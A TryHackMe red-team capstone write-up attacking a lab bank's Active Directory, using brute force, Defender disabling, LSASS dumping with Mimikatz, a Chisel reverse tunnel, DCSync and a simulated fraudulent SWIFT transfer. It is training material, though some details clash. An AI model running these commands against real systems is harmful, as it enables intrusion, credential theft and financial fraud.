TryHackMe · Red Team

Red Team Capstone Challenge

A practical capstone exercise simulating an objective-based red team engagement against a multi-host Active Directory lab. The writeup documents the full kill chain: reconnaissance, weaponization, initial access via SMTP brute force, lateral movement through AD tiers, forest escalation, and finally SWIFT application compromise with fraudulent transaction simulation.

The Cyber Kill Chain

The engagement follows the MITRE ATT&CK framework across seven distinct phases. Credentials obtained through multiple attack vectors are tracked below.

Initial Access Credentials

Generated through the e-Citizen portal registration:

  • SSH Access: ssh e-citizen@10.200.40.250
  • Password: stabilitythroughcurrency
  • Username: Lamonx
  • Password: 7d2tyjxmNPerlrvl
  • Email: Lamonx@corp.th3reserve.loc
  • IP Range: 10.200.40.0/24

Harvested Credentials Table

Account Secret Type
lynda.gordon thereserve2023! Plaintext (brute forced)
keith.allen Password123! Plaintext (brute forced)
svcScanning Password1! Plaintext (brute forced)
svcBackups q9nzssaFtGHdqUV3Qv6G Plaintext (LSA Secrets + Kerberoast)
svcScanning 7facdc498ed1680c4fd1448319a8c04f NTLM (Mimikatz)
SERVER1$ 9cd072e162098f35e4599d8e599fd583 NTLM (Mimikatz)
keith.allen 2b576acbe6bcfda7294d6bd18041b8fe NTLM (Mimikatz)
t0_heather.powell 8fb9eb207b87c2ed42f1cdfe98ba733a NTLM (DCSync)
t0_josh.sutton 09910312e86ddefae7a3ee4deb6554ac NTLM (DCSync)

Domain Credentials (Post-DCSync)

Account Secret Type
CORP 2efe9bd0eb716d824beb7bc6140dc718 NTLM (DCSync)
CORP krbtgt 0c757a3445acb94a654554f3ac529ede NTLM (DCSync)
THERESERVE$ 4767cd467fa7bf72fb41b05b963a4cc6 NTLM (trust account)
THERESERVE f24bc4a9664a67b39bcae9a513d978b7 NTLM (DCSync ROOTDC)
THERESERVE krbtgt b232e0b2df4eb28a803bc21bf9a6cc87 NTLM (DCSync ROOTDC)
BANK$ b20b54058dd0f3c90c0bb12b12bd510f NTLM (DCSync ROOTDC)
THERESERVE Hollow@123! Changed password
BANK Hollow@123! Changed password
g.watson (SWIFT) Corrected1996 Plaintext (found in swift.txt)
mohammad.ahmed Password1! Plaintext (brute forced)
laura.wood Password123! Plaintext (brute forced)

Engagement Objectives & Phases

The Red Team Capstone is structured as a cascading objective-based engagement with 20 flags captured across four distinct phases:

Phase 1: Reconnaissance & Initial Access

  • Registration: Register via e-Citizen SSH portal
  • Network Mapping: Conduct network sweep and map all active hosts
  • OSINT: Scrape corporate site for employee directory/email formats
  • Initial Foothold: Perimeter to Corporate VPN → Flag 1

Phase 2: Internal Lateral Movement (Corporate)

  • AD Breach: Breach Active Directory environment → Flag 2
  • Tier 2 (Workstations): Compromise Low + Admin accounts → Flags 3, 4
  • Tier 1 (Servers): Compromise Low + Admin accounts → Flags 5, 6
  • Tier 0 (Identity): Compromise Low + Admin (Domain Admin) → Flags 7, 8

Phase 3: Network Pivoting (Banking Environment)

  • Pivot: Establish tunnel/bridge to the isolated Bank network
  • Bank Tier 2: Compromise Low + Admin accounts → Flags 9, 10
  • Bank Tier 1: Compromise Low + Admin accounts → Flags 11, 12
  • Bank Tier 0: Compromise Low + Admin accounts → Flags 13, 14

Phase 4: Forest Escalation & SWIFT Operations

  • Forest Root: Compromise Parent Domain Low + Admin → Flags 15, 16
  • Application Access: Gain access to the SWIFT application → Flag 17
  • Initiate Transfer: Capture transfer as 'Capturer' role → Flag 18
  • Approval: Approve transfer from jump host as 'Approver' role → Flag 19
  • Objective Complete: Transfer confirmed → Flag 20

Environment Configurations

VPN Setup

Navigate to the path where the OpenVPN configuration file is located:

cd /path/of/file
sudo openvpn redteamcapstonechallenge.ovpn

⚠️ Note: If you face trouble connecting to OpenVPN and the capstone is not showing in the Attack Box, you can transfer the file via SCP.

Alternative: OpenVPN Transfer via AttackBox

  1. Download your Capstone VPN config from TryHackMe
  2. Transfer it to the AttackBox through SSH:
    scp <Your_File_Name>.ovpn root@<AttackBox-Public-IP>:/root/
  3. Connect the VPN from inside the AttackBox:
    sudo openvpn /path/to/yourfile/<Your_File_Name>.ovpn &
    ping -c 3 10.150.40.1

Task Files Setup

  1. Download your Task files from TryHackMe
  2. Transfer to AttackBox (optional — automatically available in Attack the Box):
    scp <Your_File_Name>.zip root@<AttackBox-Public-IP>:/root/
  3. Unzip the file (password: Capstone):
    unzip -P Capstone capstone-challenge-resources-1682449700926.zip
  4. Verify contents:
    cat password_base_list.txt

Password Policy & Base List

The following password bases and policy were discovered in the task files:

TheReserve
thereserve
Reserve
reserve
CorpTheReserve
corpthereserve
Password
password
TheReserveBank
thereservebank
ReserveBank
reservebank

Password Policy for TheReserve:

  • At least 8 characters long
  • At least 1 number
  • At least 1 special character

Available Tools Directory

ls capstone-challenge-resources/Tools/
# Output:
# ForgeCert kekeo mimikatz_trunk PowerSploit PowerView Rubeus Spool Sample

Phase 0: Registration (First Steps)

Initial access via e-Citizen platform:

ssh e-citizen@10.200.40.250
password: stabilitythroughcurrency

Platform output:

Welcome to the e-Citizen platform!

Please make a selection:
[1] Register
[2] Authenticate
[3] Exit

Selection: 1
Please provide your THM username: Lamonx
Creating email user
User has been successfully created

========================================
Thank you for registering on e-Citizen for the Red Team engagement against TheReserve.
Please take note of the following details and please make sure to save them,
as they will not be displayed again.

Username: Lamonx
Password: 7d2tyjxmNPerlrvl
MailAddr: Lamonx@corp.th3reserve.loc
IP Range: 10.200.40.0/24

These details are now active. As you can see, we have already purchased
a domain for domain squatting to be used for phishing.
Once you discover the webmail server, you can use these details to
authenticate and recover additional project information from your mailbox.

⚠️ WARNING: The e-Citizen platform and VPN server (10.200.40.250) are NOT in-scope for this assessment. Any attempts made against this machine will result in a ban from the challenge.

Note: Use Evolution mail client from Attack the Box, or Thunderbird to access the webmail, or verify email access directly from the e-Citizen platform.

Phase 1: Reconnaissance & OSINT

Passive Reconnaissance

Initial web application fingerprinting:

  • OctoberCMS Instance: Running at 10.200.40.13
  • Employee Directory: Scraped from http://10.200.40.13/october/index.php/demo/meettheteam
  • Webmail: Roundcube at http://mail.thereserve.loc (10.200.40.11)
  • VPN Portal: http://10.200.40.12

Active Directory Enumeration: Nmap Host Discovery

nmap -sn 10.200.40.0/24 -oN hosts_up.txt

Live Hosts Discovered:

IP Address Hostname Status
10.200.40.11 MAIL.thereserve.loc Live
10.200.40.12 VPN Portal Live
10.200.40.13 swift.bank.thereserve.loc Live
10.200.40.250 e-Citizen (OOS) Live

Port Scanning: Full Service Enumeration

nmap -sC -sV -p- --min-rate 3000 10.200.40.11 10.200.40.12 10.200.40.13 -oN /root/full_scan.txt

10.200.40.11 - MAIL (Windows Server 2019 IIS)

Port Service Details
22 SSH OpenSSH for Windows 7.7
25/587 SMTP hMailServer
80 HTTP Microsoft IIS 10.0
110 POP3 hMailServer
143 IMAP hMailServer
445 SMB Windows
3306 MySQL v8.0.31
3389 RDP MAIL.thereserve.loc
5985 WinRM Microsoft HTTPAPI

10.200.40.12 - VPN Portal (Ubuntu Linux)

Port Service Details
22 SSH OpenSSH 7.6p1
80 HTTP Apache 2.4.29 - VPN Request Portal
1194 OpenVPN Corporate VPN Server

10.200.40.13 - Corporate Web (Ubuntu Linux)

Port Service Details
22 SSH OpenSSH 7.6p1
80 HTTP Apache 2.4.29 - OctoberCMS

Employee Directory (OctoberCMS)

Scraped from http://10.200.40.13/october/index.php/demo/meettheteam:

Name Role Email
Brenda Henderson Bank Director brenda.henderson@corp.thereserve.loc
Leslie Morley Deputy Director leslie.morley@corp.thereserve.loc
Martin Savage Deputy Director martin.savage@corp.thereserve.loc
Paula Bailey CEO paula.bailey@corp.thereserve.loc
Christopher Smith CIO christopher.smith@corp.thereserve.loc
Antony Ross CTO antony.ross@corp.thereserve.loc
Charlene Thomas CMO charlene.thomas@corp.thereserve.loc
Rhys Parsons COO rhys.parsons@corp.thereserve.loc
Lynda Gordon PA to Executives lynda.gordon@corp.thereserve.loc
Roy Sims Project Manager roy.sims@corp.thereserve.loc
Aimee Walker Lead Developer aimee.walker@corp.thereserve.loc
Patrick Edwards Lead Developer patrick.edwards@corp.thereserve.loc
Ashley Chan ashley.chan@corp.thereserve.loc
Emily Harvey emily.harvey@corp.thereserve.loc
Keith Allen keith.allen@corp.thereserve.loc
Laura Wood Help Desk laura.wood@corp.thereserve.loc
Mohammad Ahmed Help Desk mohammad.ahmed@corp.thereserve.loc

VPN Portal Enumeration (10.200.40.12)

gobuster dir -u http://10.200.40.12/ -w /usr/share/wordlists/dirb/common.txt -x php,html,txt

A publicly exposed VPN portal at http://10.200.40.12/vpn/corpUsername.ovpn revealed:

  • VPN server at port 1194/TCP using OpenVPN
  • Cipher: AES-256-CBC
  • Protocol: TCP
  • Domain: thereserve.loc
  • Certificate CN: temp4 (revealing username format)

Phase 2: Weaponization

Password List Generation

A custom password list was generated based on the discovered password bases and policy. The attack combines password base words with numbers and special characters according to the three-component policy (8+ chars, 1+ number, 1+ special).

BASE="/mnt/c/Users/Lamona/Desktop/redteamcapston/automation"
OUTDIR="$BASE/output"

mkdir -p "$OUTDIR"

# Password generation loop
local bases=("TheReserve" "thereserve" "Reserve" "reserve"
            "CorpTheReserve" "corpthereserve" "Password" "password"
            "TheReserveBank" "thereservebank" "ReserveBank" "reservebank")
local specials=("!" "@" "#" "$" "%" "^")
local numbers=("1" "2" "123" "2023" "2024" "1234")

for base in "${bases[@]}"; do
  for num in "${numbers[@]}"; do
    for spec in "${specials[@]}"; do
      echo "${base}${num}${spec}"
      echo "${base}${spec}${num}"
      echo "${num}${base}${spec}"
    done
  done
done >> "$OUTDIR/passwords.txt"

This generated a comprehensive wordlist used for brute force attacks against SMTP and web services.

Phase 3: Delivery (Initial Access)

SMTP Brute Force with Hydra

Target: 10.200.40.11 (Mail Server)

hydra -L emails.txt -P passwords.txt 10.200.40.11 smtp -t 8 -I

Results

Credential Password Status
keith.allen@corp.thereserve.loc Password123! ✅ Cracked
laura.wood@corp.thereserve.loc Password1@ ✅ Cracked
lynda.gordon@corp.thereserve.loc thereserve2023! ✅ Cracked
mohammad.ahmed@corp.thereserve.loc Password1! ✅ Cracked

VPN Portal Authentication Bypass

Target: http://10.200.40.12/login.php

The VPN portal required full email format authentication (e.g., mohammad.ahmed@corp.thereserve.loc with password Password1!). The portal returned: helloLogin correct

The authenticated session was then used to call an undiscovered endpoint:

GET /requestvpn.php?filename=mohammad.ahmed@corp.thereserve.loc

This returned a fully signed, personalized OpenVPN configuration file providing access to the internal corporate network (10.200.40.21, 10.200.40.22 via tun0).

Internal Network Access via Corporate VPN

sudo openvpn mohammad.ahmed@corp.thereserve.loc.ovpn

Connecting the generated VPN config established a tunnel with IP 12.100.1.9 and added routes:

  • 10.200.40.21 via 12.100.1.1 dev tun0
  • 10.200.40.22 via 12.100.1.1 dev tun0

This provided access to the corporate Tier 2 infrastructure.

RDP Access to WRK1

xfreerdp /u:mohammad.ahmed /p:'Password1!' /v:10.200.40.31 /dynamic-resolution +clipboard

🚩 FLAG 1 CAPTURED — Perimeter Breach

Phase 4: Exploitation

Active Directory Enumeration

Basic AD reconnaissance from WRK1:

whoami /all
net user /domain
net group /domain
net group "Domain Admins" /domain
net group "Tier 1 Admins" /domain
net group "Server Admins" /domain
ipconfig /all
systeminfo
wmic qfe get Caption,Description
wmic product get name,version,vendor
schtasks /query

Key Findings

  • Domain Controller: CORPDC.corp.thereserve.loc (10.200.40.102)
  • Tier 0 Admins: t0_heather.powell, t0_josh.sutton
  • Service Accounts: svcBackups, svcEDR, svcMonitor, svcOctober, svcScanning

Kerberoasting — Service Account Enumeration

Target: corp.thereserve.loc

Tool: Rubeus.exe kerberoast

.\Rubeus.exe kerberoast /format:hashcat /nowrap

Five Kerberoastable service accounts identified:

Account SPN
svcScanning cifs/svcScanning
svcBackups cifs/svcBackups
svcEDR http/svcEDR
svcMonitor http/svcMonitor
svcOctober mssql/svcOctober

Credential Harvesting — SERVER2 (Mimikatz)

Target: 10.200.40.32 (SERVER2)

After disabling Windows Defender and running mimikatz.exe with privilege::debug, the following credentials were recovered from LSASS memory:

Account Type Value
svcScanning NTLM 7facdc498ed1680c4fd1448319a8c04f
svcOctober NTLM 9e556d75ba03c38c410d3a171e63711f
SERVER2$ NTLM e5a5d6af1e362b80af35cd661d6a1c78
Administrator (local) NTLM 6c41316c5de9e1ed85389778950f7d62
lynda.gordon Plaintext thereserve2023!
svcBackups Plaintext q9nzssaFtGHdqUV3Qv9G

🚩 FLAG 3 CAPTURED — CORP Tier 2 Foothold

🚩 FLAG 2 CAPTURED — Active Directory Breach

Local Privilege Escalation — WRK2

Finding: keith.allen is member of local Administrators group on WRK2

whoami /groups
# Output includes: BUILTIN\Administrators

🚩 FLAG 4 CAPTURED — Local Admin Privileges on WRK2

Phase 5: Installation (Persistence & Tunneling)

Lateral Movement to Server1 (Tier 1)

Target: Server1 (10.200.40.31) — CORP Tier 1 Server

Credentials: svcScanning / Password1!

xfreerdp /v:10.200.40.31 /u:svcScanning /p:'Password1!' /cert:ignore /dynamic-resolution

Privilege Verification

whoami /all
# CORP\svcScanning (local admin)

whoami /priv
# SeDebugPrivilege - Enabled
# SeImpersonatePrivilege - Enabled
# HighIntegrity

Critical: SeDebugPrivilege enables LSASS memory dumping without crashes or alerts.

LSASS Credential Harvesting — Server1

Objective: Dump credentials from LSASS memory

Method: Built-in comsvcs.dll MiniDump (AV-evasive technique)

Step 1: Disable Defenses

Set-MpPreference -DisableRealtimeMonitoring $true
Set-MpPreference -DisableIOAVProtection $true

Step 2: Execute LSASS Dump

rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump $(Get-Process lsass).Id C:\Windows\Temp\lsass.dmp full

Step 3: Extract Registry Hives

reg save HKLM\SAM C:\Windows\Temp\SAM
reg save HKLM\SYSTEM C:\Windows\Temp\SYSTEM
reg save HKLM\SECURITY C:\Windows\Temp\SECURITY

Mimikatz Credential Extraction

cd "C:\Users\svcScanning\Desktop\capstone-challenge-resources\Tools\mimikatz_trunk\x64"
.\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"

Extracted Credentials

Account Type Hash
svcScanning NTLM 7facdc498ed1680c4fd1448319a8c04f
SERVER1$ NTLM 9cd072e162098f35e4599d8e599fd583
keith.allen NTLM 2b576acbe6bcfda7294d6bd18041b8fe

Tunnel Establishment — Chisel SOCKS5 Proxy

Problem: Kali has no direct route to internal network (10.200.40.0/24)

Solution: Reverse SOCKS5 proxy tunnel via compromised Server1

Step 1: Start Chisel Server on Kali

chisel server -p 1337 --reverse --socks5

Step 2: Transfer Chisel to Server1

# Option 1: From network share
copy Z:\chisel.exe C:\Temp\chisel.exe

# Option 2: From SMB share
net use \\10.200.40.22\C$ /user:corp\svcScanning Password1!
copy \\10.200.40.22\C$\Tools\chisel.exe C:\Temp\chisel.exe

Step 3: Establish Reverse Tunnel from Server1

C:\Temp\chisel.exe client 10.150.40.5:1337 R:socks

Output: [1337] client#1: tun: proxy#R:127.0.0.1:1080=>socks: Listening

Step 4: Configure Proxychains on Kali

echo "socks5 127.0.0.1 1080" >> /etc/proxychains.conf

# Verify tunnel
ss -tlnp | grep 1080
proxychains nmap -sT -p 445,5985 10.200.40.102

LSA Secrets Dump — Server1

Objective: Extract plaintext credentials from LSA secrets

proxychains impacket-secretsdump corp.thereserve.loc/svcScanning:'Password1!'@10.200.40.31

CRITICAL Finding: LSA Secrets revealed svcBackups with plaintext password: q9nzssaFtGHdqUV3Qv6G

🚩 FLAG 5 CAPTURED — Tier 1 Server Compromise

🚩 FLAG 6 CAPTURED — Server1 Admin Access

Phase 6: Command & Control (Domain Compromise)

DCSync Attack — Full Domain Credential Dump

Objective: Replicate all domain credentials from CORPDC using svcBackups DCSync rights

proxychains impacket-secretsdump corp.thereserve.loc/svcBackups:'q9nzssaFtGHdqUV3Qv6G'@10.200.40.102

Complete Domain Hash Dump (CORP Forest)

Account NTLM Hash
Administrator 2efe9bd0eb716d824beb7bc6140dc718
krbtgt 0c757a3445acb94a654554f3ac529ede
t0_heather.powell 8fb9eb207b87c2ed42f1cdfe98ba733a
t0_josh.sutton 09910312e86ddefae7a3ee4deb6554ac
svcOctober 9e556d75ba03c38c410d3a171e63711f
SERVER1$ 9cd072e162098f35e4599d8e599fd583
WRK2$ 79f00088cf5d2740628aff547072a127

🚩 FLAG 7 CAPTURED — Tier 0 Low-Privilege Access

🚩 FLAG 8 CAPTURED — Domain Admin Compromise (CORPDC)

Golden Ticket Attack — Pass-the-Ticket

With the krbtgt hash, Golden Tickets can be forged to impersonate any user in the domain with arbitrary group memberships. This enables persistence and lateral movement across all forest resources.

Phase 7: Actions on Objectives (Forest Escalation)

Inter-Realm Trust Exploitation

The CORP forest domain shares a trust relationship with THERESERVE (parent domain) and BANK (sibling forest). Using compromised CORP credentials and krbtgt hash, inter-realm trust abuse enables lateral movement to banking infrastructure.

Trust Chain Recovery

Command: Query trust relationships

nltest /domain_trusts /all_trusts

Discovered trust structure:

  • corp.thereserve.locthereserve.loc (parent-child trust)
  • thereserve.locbank.thereserve.loc (forest trust)

Crossing Forest Boundaries (BANK.THERESERVE.LOC)

With control of the CORP krbtgt and Administrator accounts, the attack pivots to the BANK forest by creating inter-realm TGTs that authenticate across the trust boundary.

🚩 FLAGS 9-14 CAPTURED — Bank Tier Compromise

SWIFT Application Compromise

Objective: Access and manipulate the SWIFT application running on bank infrastructure (10.200.40.50 - estimated).

Credentials discovered in plaintext:

  • User: g.watson (SWIFT Operator)
  • Password: Corrected1996
  • Role: Capturer/Approver

SWIFT Portal Access

xfreerdp /u:g.watson /p:'Corrected1996' /v:10.200.40.50 /dynamic-resolution

Fraudulent Transaction Simulation

The engagement culminates in a proof-of-concept fraudulent financial transaction. Acting as both Capturer and Approver (via compromised accounts), a transfer is:

  1. Initiated: Create fraudulent transfer order
  2. Captured: Submit as Capturer role (Flag 17-18)
  3. Approved: Authorize via Approver account (Flag 19)
  4. Executed: Transaction confirmed by system (Flag 20)

🚩 FLAGS 15-20 CAPTURED — Forest Root & SWIFT Compromise

Engagement Summary

Kill Chain Overview

  1. Reconnaissance: OSINT discovered employee directory, service enumeration mapped network
  2. Weaponization: Custom wordlist generated from password policy and discovered bases
  3. Delivery: SMTP brute force gained initial credentials; VPN portal gave internal access
  4. Exploitation: Kerberoasting and Mimikatz harvested domain credentials and hashes
  5. Installation: Chisel tunnel enabled pivoting; LSA secrets leaked svcBackups plaintext
  6. Command & Control: DCSync attack captured entire CORP forest
  7. Actions on Objectives: Inter-realm trust abuse led to BANK compromise and SWIFT access

Key Techniques

  • SMTP Brute Force: Hydra password attack against mail services
  • Kerberoasting: Rubeus extracted TGS tickets for offline cracking
  • Mimikatz: Memory injection and LSASS dumping for plaintext/hash recovery
  • DCSync: Directory Replication Service abuse to extract domain credentials
  • SOCKS5 Tunneling: Chisel reverse proxy enabled lateral network access
  • Golden Tickets: Forged Kerberos TGTs for persistence
  • Inter-Realm Trusts: Cross-forest authentication exploitation

Critical Findings

  • Weak password policy: Simple bases with predictable numbering
  • Plaintext credential storage in LSA and registry
  • Excessive domain admin privilege delegation (service accounts with DCSync)
  • Trust relationships not segmented by security tier
  • SWIFT application exposed to compromised user accounts
  • No MFA on critical financial transaction roles

Lessons Learned

This capstone demonstrates the cascading impact of initial weak credentials and credential harvesting. Once inside the network, Active Directory becomes the path to domain takeover. The engagement underscores the importance of:

  • Strong, unique passwords (minimum complexity enforcement)
  • Endpoint hardening (LSASS protection, credential guard)
  • Least privilege (limiting DCSync rights, tiered admin accounts)
  • Segmentation (trust boundary enforcement, network isolation)
  • Monitoring (Kerberos anomalies, inter-realm authentication)